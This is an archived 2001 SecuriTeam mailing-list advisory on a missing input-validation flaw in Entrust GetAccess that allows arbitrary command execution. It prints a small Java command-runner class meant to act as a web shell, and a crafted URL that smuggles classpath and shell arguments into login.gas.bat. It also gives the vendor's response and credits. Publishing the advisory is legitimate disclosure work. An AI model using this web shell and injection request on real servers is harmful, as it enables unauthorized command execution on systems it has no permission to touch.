[NEWS] GetAccess Authentication Program Gives Access to All

From: support@securiteam.com
Date: 08/13/01 

From: support@securiteam.com
To: list@securiteam.com
Subject: [NEWS] GetAccess Authentication Program Gives Access to All
Message-Id: <20010813062744.9FD4A138BF@mail.der-keiler.de>
Date: Mon, 13 Aug 2001 08:27:44 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  GetAccess Authentication Program Gives Access to All
------------------------------------------------------------------------

SUMMARY

 <http://www.entrust.com/getaccess/index.htm> Entrust's GetAccess, a
product that enables single sign-on and a personalized user experience for
your web portal, suffers from a security vulnerability that allows
attackers to execute arbitrary programs.

DETAILS

Affected software versions:
 - Entrust GetAccess, all versions and platforms
 - Specifically, servers running the Access Service, administration
application, or runtimes.

Due to missing input-validation in the program it is possible to run
java-programs on the via the GetAccess program. This, combined with the
ability to upload programs, results in arbitrary command execution.

Example:
Find exploitable getAccess-class (one that accepts parameters) or
uploading of "command" program:

--- cut here (example cmd.java) ---

import java.io.*;
public class cmd {
public static void main(String args[]) {
s = null;
try {
Process p = Runtime.getRuntime().exec(args[0]+" "+args[1]);
BufferedReader stdInput = new BufferedReader(new
InputStreamReader(p.getInputStream()));
BufferedReader stdError = new BufferedReader(new
InputStreamReader(p.getErrorStream()));
System.out.println("Content-type: text/html\n\n");
while ((s = stdInput.readLine()) != null) { System.out.println(s); }
while ((s = stdError.readLine()) != null) { System.out.println(s); }
System.exit(0);
}
catch (IOException e) { e.printStackTrace(); System.exit(-1); }
} }

--- cut here ---

Then perform an HTTP request of the form:

http://hostname/sek-bin/login.gas.bat/x%20-classpath%20/whereever%20cmd%20/bin/ls%20-alsi

This will run "/whereever/cmd.class" and cause the execution of "/bin/ls
-alsi".

Vendor response:
An internet newsgroup posting on SecuriTeam has identified a vulnerability
in Entrust GetAccess that could allow unauthorized execution of Java
programs installed on GetAccess web servers. This vulnerability has been
confirmed by Entrust and a patch is forthcoming.
Detailed information on this issue has been posted to the Entrust customer
extranet on both the Entrust GetAccess Portal (
<https://login.encommerce.com/private/docs/techSupport/Patches-BugFix/e01-001.html> https://login.encommerce.com/private/docs/techSupport/Patches-BugFix/e01-001.html) and the Entrust Customer Support Extranet ( <https://www.entrust.com/support/resources/recentsecuritynotes.htm> https://www.entrust.com/support/resources/recentsecuritynotes.htm).

If you have trouble reaching the portals, please call: within North
America 877-754-7878, elsewhere 613-270-3700. A hotline has been
established for the weekend of July 28th/29th, at +1 613 220 8357.

ADDITIONAL INFORMATION

The information has been provided by <mailto:rudicarell@hotmail.com> rC
and <mailto:pavel_martak@hp.com> MARTAK,PAVEL (HP-Czechia,ex1).

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.